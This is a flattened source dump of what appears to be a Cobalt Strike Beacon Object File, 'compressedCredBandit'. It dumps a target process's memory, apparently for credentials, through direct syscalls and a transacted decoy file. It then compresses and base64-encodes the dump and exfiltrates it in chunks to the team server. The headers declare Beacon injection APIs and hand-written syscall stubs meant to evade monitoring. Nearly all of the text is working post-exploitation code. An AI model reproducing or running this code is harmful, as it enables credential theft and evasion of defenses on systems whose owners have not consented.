MiniDumpWriteDump reactOS Code*/ 602 | 603 | //Entry Function 604 | void go(char* args, int length) { 605 | 606 | //Beacon parser stuff 607 | datap parser; 608 | DWORD PID; 609 | char* outputFile; 610 | BeaconDataParse(&parser, args, length); 611 | PID = BeaconDataInt(&parser); 612 | outputFile = BeaconDataExtract(&parser, NULL); 613 | 614 | //Declare variables 615 | PBYTE returnData = NULL; 616 | HANDLE hProc = INVALID_HANDLE_VALUE; 617 | HANDLE hFile = INVALID_HANDLE_VALUE; 618 | HANDLE tFile = INVALID_HANDLE_VALUE; 619 | HANDLE mapFile = INVALID_HANDLE_VALUE; 620 | BOOL success = 0; 621 | NTSTATUS status = 0; 622 | SIZE_T ViewSize = 0; 623 | OBJECT_ATTRIBUTES objAttr; 624 | CLIENT_ID cID; 625 | InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL); 626 | cID.UniqueProcess = (PVOID)PID; 627 | cID.UniqueThread = 0; 628 | IO_STATUS_BLOCK IoStatusBlock; 629 | 630 | //Get pointer to RtlSetCurrentTransaction and RtlInitUnicodeString 631 | _RtlSetCurrentTransaction RtlSetCurrentTransaction = (_RtlSetCurrentTransaction) GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlSetCurrentTransaction"); 632 | _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString) GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString"); 633 | 634 | //Enable Debug Privs 635 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Attempting To Enable Debug Privs\n"); 636 | EnableDebugPriv(); 637 | 638 | //Open target process and if successful attempt to dump memory 639 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Attempting To Dump Proccess %d\n", PID); 640 | status = NtOpenProcess(&hProc, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, &objAttr, &cID); 641 | 642 | if (status != 0) { 643 | 644 | BeaconPrintf(CALLBACK_ERROR, "[-] NtOpenProcess failed with status %lx\n", status); 645 | } 646 | else { 647 | 648 | BeaconPrintf(CALLBACK_OUTPUT, "[+] NtOpenProcess returned HANDLE 0x%p\n", hProc); 649 | 650 | 651 | //Create Transaction 652 | status = NtCreateTransaction(&tFile, TRANSACTION_ALL_ACCESS, &objAttr, NULL, NULL, 0, 0, 0, NULL, NULL); 653 | 654 | if (status != 0) { 655 | 656 | BeaconPrintf(CALLBACK_OUTPUT, "[-] NtCreateTransaction failed with status %lx\n", status); 657 | } 658 | else { 659 | 660 | BeaconPrintf(CALLBACK_OUTPUT, "[+] NtCreateTransaction returned HANDLE 0x%p\n", tFile); 661 | } 662 | 663 | //Set Current Transaction 664 | status = RtlSetCurrentTransaction(tFile); 665 | 666 | if (status != 1) { 667 | 668 | BeaconPrintf(CALLBACK_OUTPUT, "[-] RtlSetCurrentTransaction failed with status %lx\n", status); 669 | } 670 | else { 671 | 672 | BeaconPrintf(CALLBACK_OUTPUT, "[+] RtlSetCurrentTransaction successfully set\n"); 673 | } 674 | 675 | //Set some arbitrary file path 676 | PCWSTR filePath = L"\\??\\C:\\SomeBogusFile.txt"; 677 | UNICODE_STRING unicodeString; 678 | RtlInitUnicodeString(&unicodeString, filePath); 679 | 680 | InitializeObjectAttributes(&objAttr, &unicodeString, OBJ_CASE_INSENSITIVE, NULL, NULL); 681 | 682 | const int allocSize = 0; 683 | LARGE_INTEGER largeInteger; 684 | largeInteger.QuadPart = allocSize; 685 | 686 | //Create File 687 | status = NtCreateFile(&hFile, FILE_GENERIC_READ | FILE_GENERIC_WRITE | SYNCHRONIZE, &objAttr, &IoStatusBlock, &largeInteger, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE | FILE_SHARE_READ, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); 688 | if (status != 0) { 689 | 690 | BeaconPrintf(CALLBACK_OUTPUT, "[-] NtCreateFile failed with status %lx\n", status); 691 | } 692 | else { 693 | BeaconPrintf(CALLBACK_OUTPUT, "[+] NtCreateFile returned HANDLE 0x%p\n", hFile); 694 | } 695 | 696 | //Set Current Transaction 697 | status = RtlSetCurrentTransaction(0); 698 | 699 | if (status != 1) { 700 | 701 | BeaconPrintf(CALLBACK_OUTPUT, "[-] RtlSetCurrentTransaction failed with status %lx\n", status); 702 | } 703 | else { 704 | 705 | BeaconPrintf(CALLBACK_OUTPUT, "[+] RtlSetCurrentTransaction successfully set\n", status); 706 | } 707 | 708 | //Create MiniDump using ReactOS minidumpwritedump code 709 | success = MiniDumpWriteDumpA(hProc, PID, hFile); 710 | 711 | if (success = 0) { 712 | BeaconPrintf(CALLBACK_OUTPUT, "[-] MiniDump failed. GetLastError = (%ld)\n", KERNEL32$GetLastError()); 713 | } 714 | else 715 | { 716 | BeaconPrintf(CALLBACK_OUTPUT, "[+] MiniDump written to memory\n"); 717 | } 718 | 719 | //Get size of MiniDump 720 | LARGE_INTEGER fs; 721 | success = KERNEL32$GetFileSizeEx(hFile, &fs); 722 | unsigned long long fileSize = fs.QuadPart; 723 | BeaconPrintf(CALLBACK_OUTPUT, "[+] MiniDump Size In Bytes = %d\n", fileSize); 724 | 725 | //Create mapped file and read dump contents into buffer 726 | status = NtCreateSection(&mapFile, SECTION_MAP_READ, 0, &largeInteger, PAGE_READONLY, SEC_COMMIT, hFile); 727 | 728 | if (status != 0) { 729 | 730 | BeaconPrintf(CALLBACK_OUTPUT, "[-] NtCreateSection failed with status %lx\n", status); 731 | } 732 | else { 733 | 734 | BeaconPrintf(CALLBACK_OUTPUT, "[+] NtCreateSection created\n"); 735 | } 736 | 737 | status = NtMapViewOfSection(mapFile, (HANDLE)-1, &returnData, 0, 0, 0, &ViewSize, ViewUnmap, 0, PAGE_READONLY); 738 | 739 | if (status != 0) { 740 | 741 | BeaconPrintf(CALLBACK_OUTPUT, "[-] NtMapViewOfSection failed with status %lx\n", status); 742 | } 743 | else { 744 | 745 | BeaconPrintf(CALLBACK_OUTPUT, "[+] NtMapViewOfSection successful\n"); 746 | 747 | } 748 | 749 | /*Note: At this point returnData holds our memory dump -> You could choose to encrypt it, compress it, write it to disk somwhere, whatever. You do you*/ 750 | 751 | // Compress it! 752 | LoadLibrary("cabinet.dll"); 753 | COMPRESSOR_HANDLE Compressor = NULL; 754 | PBYTE CompressedBuffer = NULL; 755 | SIZE_T CompressedDataSize; 756 | SIZE_T CompressedBufferSize; 757 | DWORD InputFileSize; 758 | 759 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Compressing data.\n"); 760 | 761 | if (!CABINET$CreateCompressor(COMPRESS_ALGORITHM_MSZIP, NULL, &Compressor)) 762 | { 763 | BeaconPrintf(CALLBACK_ERROR, "[!] Failed to create compressor.\n"); 764 | return; 765 | } 766 | 767 | if (!CABINET$Compress(Compressor, returnData, fileSize, NULL, 0, &CompressedBufferSize)) 768 | { 769 | DWORD ErrorCode = KERNEL32$GetLastError(); 770 | 771 | if (ErrorCode != ERROR_INSUFFICIENT_BUFFER) 772 | { 773 | BeaconPrintf(CALLBACK_OUTPUT, "[-] Compress failed with GetLastError = (%ld)\n", ErrorCode); 774 | BeaconPrintf(CALLBACK_ERROR, "[!] Failed to get compressed buffer size.\n"); 775 | return; 776 | } 777 | 778 | CompressedBuffer = (PBYTE)MSVCRT$malloc(CompressedBufferSize); 779 | if (!CompressedBuffer) 780 | { 781 | BeaconPrintf(CALLBACK_ERROR, "[!] Failed to allocate buffer.\n"); 782 | return; 783 | } 784 | } 785 | 786 | 787 | if (!CABINET$Compress(Compressor, returnData, fileSize, CompressedBuffer, CompressedBufferSize, &CompressedDataSize)) 788 | { 789 | BeaconPrintf(CALLBACK_ERROR, "[!] Failed to compress the data\n"); 790 | return; 791 | } 792 | 793 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Compressed Size: %d\n", CompressedDataSize); 794 | 795 | //Base64 our MiniDump 796 | size_t outputLength = 0; 797 | // char* base64returnDataString = base64_encode(returnData, fileSize, &outputLength); 798 | char* base64returnDataString = base64_encode(CompressedBuffer, CompressedDataSize, &outputLength); 799 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Base64 Length In Bytes = %d\n", outputLength); 800 | 801 | void* baseAddress = (void*)base64returnDataString; 802 | 803 | /*Note: At this point base64returnDataString also holds our now base64 memory dump and I have added code to optionally write to disk -> Again, like mentioned above you could do whatever after this, for example skip the BeaconPrintf POC and send out via different comms method*/ 804 | 805 | if (MSVCRT$strcmp(outputFile,"") != 0) { 806 | 807 | //Create a file on disk and write our buffer to path operator chose 808 | DWORD bytesWritten = 0; 809 | HANDLE writeFile = KERNEL32$CreateFileA(outputFile, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 810 | success = KERNEL32$WriteFile(writeFile, base64returnDataString, (DWORD)outputLength, &bytesWritten, NULL); 811 | if (success != 0) { 812 | 813 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Writing file was successful\n"); 814 | } 815 | else 816 | { 817 | BeaconPrintf(CALLBACK_OUTPUT, "[-] WriteFile failed with GetLastError = (%ld)\n", KERNEL32$GetLastError()); 818 | } 819 | 820 | //close handle 821 | status = NtClose(writeFile); 822 | } 823 | else 824 | { 825 | 826 | //Chunk the data and send it back to team server -> Probably a beter way ¯\_(ツ)_/¯ 827 | size_t size = 1021; 828 | char* toSend = (char*)intAlloc(size); 829 | ULONG CurLen = 0; 830 | ULONG ChkLen = 1020; 831 | MSVCRT$memset(toSend, 0, size); 832 | 833 | //If larger than 100 MB we are going to split in half plus slow our roll a bit to help make sure we get the entire dump back and our beacon doesn't die 834 | //Note: If you wanted to be really safe, you could split the data into 100 MB chunks. This way if your dump file is for example 400MB you can manage it easier with less risk of losing your beacon. 835 | if (outputLength > 100000000) { 836 | 837 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Dump larger than 100 MB. Going to chunk and start sending half\n"); 838 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Then sleep for 3 minutes so CS can catch up and send last half...\n"); 839 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Data Exfiltration Will Take Several Minutes So Be Patient...\n"); 840 | 841 | //Check if outputLength is odd or even and if odd make even to easily split in half 842 | BOOL isOdd = 0; 843 | if ( outputLength%2 != 0 ) { 844 | 845 | outputLength = outputLength + 1; 846 | isOdd = 1; 847 | } 848 | 849 | //Split outputLength in half 850 | int splitOutputLength = outputLength / 2; 851 | 852 | //If output was originally even 853 | if ( isOdd != 1 ) { 854 | 855 | //Send first half 856 | for (; ((splitOutputLength - CurLen) - ChkLen) >= 0 && CurLen < splitOutputLength; CurLen += ChkLen) { 857 | MSVCRT$memcpy(toSend, base64returnDataString, ChkLen); 858 | BeaconPrintf(CALLBACK_OUTPUT, "%s", toSend); 859 | MSVCRT$memset(toSend, 0, size); 860 | base64returnDataString = (char*)base64returnDataString + ChkLen; 861 | }; 862 | 863 | //Sleep 3 min and let CS catch up 864 | KERNEL32$Sleep (180000); 865 | 866 | //Send second half 867 | for (; ((outputLength - CurLen) - ChkLen) >= 0 && CurLen < outputLength; CurLen += ChkLen) { 868 | MSVCRT$memcpy(toSend, base64returnDataString, ChkLen); 869 | BeaconPrintf(CALLBACK_OUTPUT, "%s", toSend); 870 | MSVCRT$memset(toSend, 0, size); 871 | base64returnDataString = (char*)base64returnDataString + ChkLen; 872 | }; 873 | 874 | } 875 | else 876 | { 877 | 878 | outputLength = outputLength - 1; 879 | 880 | //Send first half 881 | for (; ((splitOutputLength - CurLen) - ChkLen) >= 0 && CurLen < splitOutputLength; CurLen += ChkLen) { 882 | MSVCRT$memcpy(toSend, base64returnDataString, ChkLen); 883 | BeaconPrintf(CALLBACK_OUTPUT, "%s", toSend); 884 | MSVCRT$memset(toSend, 0, size); 885 | base64returnDataString = (char*)base64returnDataString + ChkLen; 886 | }; 887 | 888 | //Sleep 3 min and let CS catch up 889 | KERNEL32$Sleep (180000); 890 | 891 | //Send second half 892 | for (; ((outputLength - CurLen) - ChkLen) >= 0 && CurLen < outputLength; CurLen += ChkLen) { 893 | MSVCRT$memcpy(toSend, base64returnDataString, ChkLen); 894 | BeaconPrintf(CALLBACK_OUTPUT, "%s", toSend); 895 | MSVCRT$memset(toSend, 0, size); 896 | base64returnDataString = (char*)base64returnDataString + ChkLen; 897 | }; 898 | } 899 | } 900 | else 901 | { 902 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Data Exfiltration might Take A Few Minutes So Be Patient...\n"); 903 | //Less than 100 MB so we just send the whole dump file 904 | for (; ((outputLength - CurLen) - ChkLen) >= 0 && CurLen < outputLength; CurLen += ChkLen) { 905 | MSVCRT$memcpy(toSend, base64returnDataString, ChkLen); 906 | BeaconPrintf(CALLBACK_OUTPUT, "%s", toSend); 907 | MSVCRT$memset(toSend, 0, size); 908 | base64returnDataString = (char*)base64returnDataString + ChkLen; 909 | }; 910 | } 911 | } 912 | 913 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Dump completed\n"); 914 | 915 | //Close Handles 916 | status = NtClose(hProc); 917 | status = NtClose(tFile); 918 | status = NtClose(hFile); 919 | 920 | //Free memory 921 | MSVCRT$free(baseAddress); 922 | } 923 | } 924 | -------------------------------------------------------------------------------- /src/include/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char* original; /* the original buffer [so we can free it] */ 13 | char* buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap* parser, char* buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap* parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap* parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap* parser); 22 | DECLSPEC_IMPORT char* BeaconDataExtract(datap* parser, int* size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char* original; /* the original buffer [so we can free it] */ 27 | char* buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp* format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp* format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp* format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp* format, char* text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp* format, char* fmt, ...); 37 | DECLSPEC_IMPORT char* BeaconFormatToString(formatp* format, int* size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp* format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char* fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char* data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char* buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char* arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION* pInfo, char* payload, int p_len, int p_offset, char* arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION* pInfo); 59 | 60 | /* Utility Functions */ 61 | DECLSPEC_IMPORT BOOL toWideChar(char* src, wchar_t* dst, int max); 62 | -------------------------------------------------------------------------------- /src/include/compressedCredBandit.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 6 | #define STATUS_SUCCESS 0 7 | #define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) 8 | #define FILE_OVERWRITE_IF 0x00000005 9 | #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 10 | #define FILE_CREATE 0x00000002 11 | #define FILE_NON_DIRECTORY_FILE 0x00000040 12 | #define OBJ_CASE_INSENSITIVE 0x00000040L 13 | #define ARRAY_SIZE(a) (sizeof(a)/sizeof((a)[0])) 14 | 15 | WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(); 16 | WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 17 | WINBASEAPI LPVOID WINAPI KERNEL32$HeapReAlloc (HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes); 18 | WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID); 19 | WINBASEAPI int WINAPI KERNEL32$lstrlenW (LPCWSTR lpString); 20 | WINBASEAPI LPWSTR WINAPI KERNEL32$lstrcpyW (LPWSTR lpString1, LPCWSTR lpString2); 21 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID); 22 | WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess (VOID); 23 | WINBASEAPI DWORD WINAPI KERNEL32$SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod); 24 | WINBASEAPI BOOL WINAPI KERNEL32$SetFilePointerEx(HANDLE hFile, LARGE_INTEGER liDistanceToMove, PLARGE_INTEGER lpDistanceToMoveHigh, DWORD dwMoveMethod); 25 | WINBASEAPI BOOL WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped); 26 | WINBASEAPI void WINAPI KERNEL32$GetSystemInfo(LPSYSTEM_INFO lpSystemInfo); 27 | WINBASEAPI BOOL WINAPI KERNEL32$IsProcessorFeaturePresent(DWORD ProcessorFeature); 28 | WINBASEAPI BOOL WINAPI KERNEL32$GetFileSizeEx(HANDLE hFile, PLARGE_INTEGER lpFileSize); 29 | WINBASEAPI SIZE_T WINAPI KERNEL32$VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); 30 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA (LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 31 | WINBASEAPI DWORD WINAPI KERNEL32$GetProcessId(HANDLE Process); 32 | WINBASEAPI BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead); 33 | WINBASEAPI VOID WINAPI KERNEL32$Sleep (DWORD dwMilliseconds); 34 | WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount); 35 | WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count); 36 | WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T); 37 | DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char *_Str1,const char *_Str2); 38 | WINBASEAPI void* WINAPI MSVCRT$free(void*); 39 | WINBASEAPI BOOL IMAGEAPI DBGHELP$EnumerateLoadedModulesW64(HANDLE hProcess, PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback, PVOID UserContext); 40 | WINBASEAPI BOOL IMAGEAPI DBGHELP$SymInitializeW(HANDLE hProcess, PCWSTR UserSearchPath, BOOL fInvadeProcess); 41 | WINBASEAPI BOOL IMAGEAPI DBGHELP$SymCleanup(HANDLE hProcess); 42 | WINADVAPI BOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid); 43 | DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExW(HANDLE hProcess, HMODULE hModule, LPWSTR lpFilename, DWORD nSize); 44 | DECLSPEC_IMPORT DWORD WINAPI VERSION$GetFileVersionInfoSizeW(LPCWSTR lptstrFilenamea ,LPDWORD lpdwHandle); 45 | DECLSPEC_IMPORT WINBOOL WINAPI VERSION$GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData); 46 | DECLSPEC_IMPORT WINBOOL WINAPI VERSION$VerQueryValueW(LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen); 47 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid); 48 | 49 | // Compression Stuff 50 | #define COMPRESS_ALGORITHM_INVALID 0 51 | #define COMPRESS_ALGORITHM_NULL 1 52 | #define COMPRESS_ALGORITHM_MSZIP 2 53 | #define COMPRESS_ALGORITHM_XPRESS 3 54 | #define COMPRESS_ALGORITHM_XPRESS_HUFF 4 55 | #define COMPRESS_ALGORITHM_LZMS 5 56 | #define COMPRESS_ALGORITHM_MAX 6 57 | 58 | #define COMPRESS_RAW (1 << 29) 59 | 60 | typedef enum { 61 | COMPRESS_INFORMATION_CLASS_INVALID = 0, 62 | COMPRESS_INFORMATION_CLASS_BLOCK_SIZE, 63 | COMPRESS_INFORMATION_CLASS_LEVEL 64 | } COMPRESS_INFORMATION_CLASS; 65 | 66 | DECLARE_HANDLE (COMPRESSOR_HANDLE); 67 | 68 | typedef COMPRESSOR_HANDLE *PCOMPRESSOR_HANDLE; 69 | typedef COMPRESSOR_HANDLE DECOMPRESSOR_HANDLE; 70 | typedef COMPRESSOR_HANDLE *PDECOMPRESSOR_HANDLE; 71 | typedef PVOID (__cdecl *PFN_COMPRESS_ALLOCATE) (PVOID UserContext, SIZE_T Size); 72 | typedef VOID (__cdecl *PFN_COMPRESS_FREE) (PVOID UserContext, PVOID Memory); 73 | 74 | typedef struct _COMPRESS_ALLOCATION_ROUTINES { 75 | PFN_COMPRESS_ALLOCATE Allocate; 76 | PFN_COMPRESS_FREE Free; 77 | PVOID UserContext; 78 | } COMPRESS_ALLOCATION_ROUTINES,*PCOMPRESS_ALLOCATION_ROUTINES; 79 | 80 | WINBASEAPI WINBOOL WINAPI CABINET$CreateCompressor(DWORD Algorithm, PCOMPRESS_ALLOCATION_ROUTINES AllocationRoutines, PCOMPRESSOR_HANDLE CompressorHandle); 81 | WINBASEAPI WINBOOL WINAPI CABINET$Compress (COMPRESSOR_HANDLE CompressorHandle, PVOID UncompressedData, SIZE_T UncompressedDataSize, PVOID CompressedBuffer, SIZE_T CompressedBufferSize, PSIZE_T CompressedDataSize); 82 | WINBASEAPI WINBOOL WINAPI CABINET$CloseDecompressor (DECOMPRESSOR_HANDLE DecompressorHandle); 83 | 84 | typedef void (WINAPI* _RtlInitUnicodeString) (PUNICODE_STRING DestinationString, PCWSTR SourceString); 85 | typedef NTSTATUS (WINAPI* _RtlSetCurrentTransaction) (PHANDLE); 86 | 87 | typedef struct _THREAD_BASIC_INFORMATION 88 | { 89 | NTSTATUS ExitStatus; 90 | PVOID TebBaseAddress; 91 | CLIENT_ID ClientId; 92 | KAFFINITY AffinityMask; 93 | KPRIORITY Priority; 94 | KPRIORITY BasePriority; 95 | } THREAD_BASIC_INFORMATION, * PTHREAD_BASIC_INFORMATION; 96 | 97 | typedef DWORD RVA; 98 | typedef ULONG64 RVA64; 99 | 100 | struct process 101 | { 102 | struct process* next; 103 | HANDLE handle; 104 | const struct loader_ops* loader; 105 | WCHAR* search_path; 106 | WCHAR* environment; 107 | 108 | PSYMBOL_REGISTERED_CALLBACK64 reg_cb; 109 | PSYMBOL_REGISTERED_CALLBACK reg_cb32; 110 | BOOL reg_is_unicode; 111 | DWORD64 reg_user; 112 | 113 | struct module* lmodules; 114 | ULONG_PTR dbg_hdr_addr; 115 | 116 | IMAGEHLP_STACK_FRAME ctx_frame; 117 | 118 | unsigned buffer_size; 119 | void* buffer; 120 | 121 | BOOL is_64bit; 122 | }; 123 | 124 | struct dump_context 125 | { 126 | /* process & thread information */ 127 | struct process* process; 128 | DWORD pid; 129 | HANDLE handle; 130 | unsigned flags_out; 131 | /* thread information */ 132 | struct dump_thread* threads; 133 | unsigned num_threads; 134 | /* module information */ 135 | struct dump_module* modules; 136 | unsigned num_modules; 137 | unsigned alloc_modules; 138 | /* exception information */ 139 | /* output information */ 140 | MINIDUMP_TYPE type; 141 | HANDLE hFile; 142 | RVA rva; 143 | struct dump_memory* mem; 144 | unsigned num_mem; 145 | unsigned alloc_mem; 146 | struct dump_memory64* mem64; 147 | unsigned num_mem64; 148 | unsigned alloc_mem64; 149 | /* callback information */ 150 | MINIDUMP_CALLBACK_INFORMATION* cb; 151 | }; 152 | 153 | struct line_info 154 | { 155 | ULONG_PTR is_first : 1, 156 | is_last : 1, 157 | is_source_file : 1, 158 | line_number; 159 | union 160 | { 161 | ULONG_PTR pc_offset; /* if is_source_file isn't set */ 162 | unsigned source_file; /* if is_source_file is set */ 163 | } u; 164 | }; 165 | 166 | struct module_pair 167 | { 168 | struct process* pcs; 169 | struct module* requested; /* in: to module_get_debug() */ 170 | struct module* effective; /* out: module with debug info */ 171 | }; 172 | 173 | enum pdb_kind { PDB_JG, PDB_DS }; 174 | 175 | struct pdb_lookup 176 | { 177 | const char* filename; 178 | enum pdb_kind kind; 179 | DWORD age; 180 | DWORD timestamp; 181 | GUID guid; 182 | }; 183 | 184 | struct cpu_stack_walk 185 | { 186 | HANDLE hProcess; 187 | HANDLE hThread; 188 | BOOL is32; 189 | struct cpu* cpu; 190 | union 191 | { 192 | struct 193 | { 194 | PREAD_PROCESS_MEMORY_ROUTINE f_read_mem; 195 | PTRANSLATE_ADDRESS_ROUTINE f_xlat_adr; 196 | PFUNCTION_TABLE_ACCESS_ROUTINE f_tabl_acs; 197 | PGET_MODULE_BASE_ROUTINE f_modl_bas; 198 | } s32; 199 | struct 200 | { 201 | PREAD_PROCESS_MEMORY_ROUTINE64 f_read_mem; 202 | PTRANSLATE_ADDRESS_ROUTINE64 f_xlat_adr; 203 | PFUNCTION_TABLE_ACCESS_ROUTINE64 f_tabl_acs; 204 | PGET_MODULE_BASE_ROUTINE64 f_modl_bas; 205 | } s64; 206 | } u; 207 | }; 208 | 209 | struct dump_memory 210 | { 211 | ULONG64 base; 212 | ULONG size; 213 | ULONG rva; 214 | }; 215 | 216 | struct dump_memory64 217 | { 218 | ULONG64 base; 219 | ULONG64 size; 220 | }; 221 | 222 | struct dump_module 223 | { 224 | unsigned is_elf; 225 | ULONG64 base; 226 | ULONG size; 227 | DWORD timestamp; 228 | DWORD checksum; 229 | WCHAR name[MAX_PATH]; 230 | }; 231 | 232 | struct dump_thread 233 | { 234 | ULONG tid; 235 | ULONG prio_class; 236 | ULONG curr_prio; 237 | }; 238 | -------------------------------------------------------------------------------- /src/include/syscalls-asm.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "syscalls.h" 3 | 4 | #define ZwCreateFile NtCreateFile 5 | __asm__("NtCreateFile: \n\ 6 | mov rax, gs:[0x60] \n\ 7 | NtCreateFile_Check_X_X_XXXX: \n\ 8 | cmp dword ptr [rax+0x118], 6 \n\ 9 | je NtCreateFile_Check_6_X_XXXX \n\ 10 | cmp dword ptr [rax+0x118], 10 \n\ 11 | je NtCreateFile_Check_10_0_XXXX \n\ 12 | jmp NtCreateFile_SystemCall_Unknown \n\ 13 | NtCreateFile_Check_6_X_XXXX: \n\ 14 | cmp dword ptr [rax+0x11c], 1 \n\ 15 | je NtCreateFile_Check_6_1_XXXX \n\ 16 | cmp dword ptr [rax+0x11c], 2 \n\ 17 | je NtCreateFile_SystemCall_6_2_XXXX \n\ 18 | cmp dword ptr [rax+0x11c], 3 \n\ 19 | je NtCreateFile_SystemCall_6_3_XXXX \n\ 20 | jmp NtCreateFile_SystemCall_Unknown \n\ 21 | NtCreateFile_Check_6_1_XXXX: \n\ 22 | cmp word ptr [rax+0x120], 7600 \n\ 23 | je NtCreateFile_SystemCall_6_1_7600 \n\ 24 | cmp word ptr [rax+0x120], 7601 \n\ 25 | je NtCreateFile_SystemCall_6_1_7601 \n\ 26 | jmp NtCreateFile_SystemCall_Unknown \n\ 27 | NtCreateFile_Check_10_0_XXXX: \n\ 28 | cmp word ptr [rax+0x120], 10240 \n\ 29 | je NtCreateFile_SystemCall_10_0_10240 \n\ 30 | cmp word ptr [rax+0x120], 10586 \n\ 31 | je NtCreateFile_SystemCall_10_0_10586 \n\ 32 | cmp word ptr [rax+0x120], 14393 \n\ 33 | je NtCreateFile_SystemCall_10_0_14393 \n\ 34 | cmp word ptr [rax+0x120], 15063 \n\ 35 | je NtCreateFile_SystemCall_10_0_15063 \n\ 36 | cmp word ptr [rax+0x120], 16299 \n\ 37 | je NtCreateFile_SystemCall_10_0_16299 \n\ 38 | cmp word ptr [rax+0x120], 17134 \n\ 39 | je NtCreateFile_SystemCall_10_0_17134 \n\ 